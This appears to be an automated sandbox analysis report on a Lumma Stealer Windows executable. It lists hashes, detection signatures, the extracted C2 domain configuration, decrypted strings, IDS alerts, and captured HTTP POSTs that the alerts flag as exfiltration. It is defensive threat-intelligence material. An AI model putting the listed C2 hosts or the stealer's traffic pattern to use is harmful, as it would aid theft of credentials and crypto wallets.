Windows Analysis Report
hx0wBsOjkQ.exe

Overview

General Information

Sample name: hx0wBsOjkQ.exe (renamed because original name is a hash value)
Original sample name: e58e6e26d4ff748bd8e7f718372f8351.exe
Analysis ID: 1581582
MD5: e58e6e26d4ff748bd8e7f718372f8351
SHA1: 5ec62018f2c5e2f7b91be03fa1c022ad3368cab8
SHA256: 1b7cdc9c01de521674db6bc4f5ef66d4666d084cf197b8adec56bc431992c253
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • hx0wBsOjkQ.exe (PID: 8048 cmdline: "C:\Users\user\Desktop\hx0wBsOjkQ.exe" MD5: E58E6E26D4FF748BD8E7F718372F8351)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["prisonyfork.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "mindhandru.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1624031849.0000000000E20000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1599366163.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1626918311.0000000000E20000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-28T09:29:39.410611+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49700 | 23.55.153.106 | 443 | TCP
2024-12-28T09:29:41.830604+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49701 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:43.843810+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49702 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:46.317494+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49703 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:48.506896+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49704 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:51.109686+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:54.467025+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:57.393602+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49710 | 172.67.157.254 | 443 | TCP
2024-12-28T09:30:00.285341+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:42.579579+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49701 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:44.589530+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49702 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:42.579579+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49701 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:44.589530+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.10 | 49702 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:37.387470+0100 | 2058572 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 50916 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:37.530359+0100 | 2058576 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 52703 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:37.676217+0100 | 2058578 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 52990 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:37.100521+0100 | 2058580 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 59321 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:36.356310+0100 | 2058582 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 55284 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:36.561159+0100 | 2058584 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 60268 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:36.804865+0100 | 2058586 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 54830 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:36.952553+0100 | 2058588 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 58740 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:37.245130+0100 | 2058590 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 60102 | 1.1.1.1 | 53 | UDP
2024-12-28T09:29:49.645133+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49704 | 172.67.157.254 | 443 | TCP
2024-12-28T09:29:40.200416+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49700 | 23.55.153.106 | 443 | TCP

                AV Detection

Source: hx0wBsOjkQ.exe, Avira: detected
Source: https://lev-tolstoi.com/apipt, Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/m/, Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apirofiles/76561199724331900, Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/piA, Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apill, Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz:443/apia, Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apis, Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/9, Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiaLxz, Avira URL Cloud: Label: malware
Source: https://scentniej.buzz:443/api, Avira URL Cloud: Label: malware
Source: https://cashfuzysao.buzz:443/api, Avira URL Cloud: Label: malware
Source: https://hummskitnj.buzz:443/api, Avira URL Cloud: Label: malware
Source: hx0wBsOjkQ.exe.8048.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "mindhandru.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
Source: hx0wBsOjkQ.exe, Virustotal: Detection: 53%
Source: hx0wBsOjkQ.exe, ReversingLabs: Detection: 57%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: hx0wBsOjkQ.exe, Joe Sandbox ML: detected
Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, String decryptor (one decrypted string per line):
    hummskitnj.buzz
    cashfuzysao.buzz
    appliacnesot.buzz
    screwamusresz.buzz
    inherineau.buzz
    scentniej.buzz
    rebuildeso.buzz
    prisonyfork.buzz
    mindhandru.buzz
    lid=%s&j=%s&ver=4.0
    TeslaBrowser/5.5
    - Screen Resoluton:
    - Physical Installed Memory:
    Workgroup: -
    PsFKDg--pablo
Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe, Code function: 0_2_003F57C0 CryptUnprotectData, 0_2_003F57C0
Source: hx0wBsOjkQ.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.10:49700 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49701 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49710 version: TLS 1.2

                Networking

Source: Network traffic, Suricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.10:60268 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.10:59321 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.10:58740 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.10:55284 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.10:60102 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.10:50916 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.10:52990 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.10:52703 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.10:54830 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49701 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49701 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49700 -> 23.55.153.106:443
Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49702 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49702 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49704 -> 172.67.157.254:443
Source: Malware configuration extractor, URLs: prisonyfork.buzz
Source: Malware configuration extractor, URLs: hummskitnj.buzz
Source: Malware configuration extractor, URLs: rebuildeso.buzz
Source: Malware configuration extractor, URLs: cashfuzysao.buzz
Source: Malware configuration extractor, URLs: screwamusresz.buzz
Source: Malware configuration extractor, URLs: appliacnesot.buzz
Source: Malware configuration extractor, URLs: inherineau.buzz
Source: Malware configuration extractor, URLs: mindhandru.buzz
Source: Malware configuration extractor, URLs: scentniej.buzz
Source: Joe Sandbox View, IP Address: 172.67.157.254
Source: Joe Sandbox View, IP Address: 23.55.153.106
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49700 -> 23.55.153.106:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49707 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49704 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49710 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49705 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49701 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49703 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49711 -> 172.67.157.254:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49702 -> 172.67.157.254:443
Source: global traffic, HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic, HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=37NC9T5A4478IQUMN
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12841
    Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=J41QSBOU
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15014
    Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SCT42TTR89
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20388
    Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=V7XJLHITGPCI
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1210
    Host: lev-tolstoi.com
Source: global traffic, HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=L4TJPNUKPYCP0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 568342
    Host: lev-tolstoi.com
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic, DNS traffic detected: DNS query: prisonyfork.buzz
Source: global traffic, DNS traffic detected: DNS query: rebuildeso.buzz
Source: global traffic, DNS traffic detected: DNS query: scentniej.buzz
Source: global traffic, DNS traffic detected: DNS query: inherineau.buzz
Source: global traffic, DNS traffic detected: DNS query: screwamusresz.buzz
Source: global traffic, DNS traffic detected: DNS query: appliacnesot.buzz
Source: global traffic, DNS traffic detected: DNS query: cashfuzysao.buzz
Source: global traffic, DNS traffic detected: DNS query: hummskitnj.buzz
Source: global traffic, DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic, DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown, HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1599230927.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cashfuzysao.buzz:443/api
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626755261.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599605647.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/imag
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
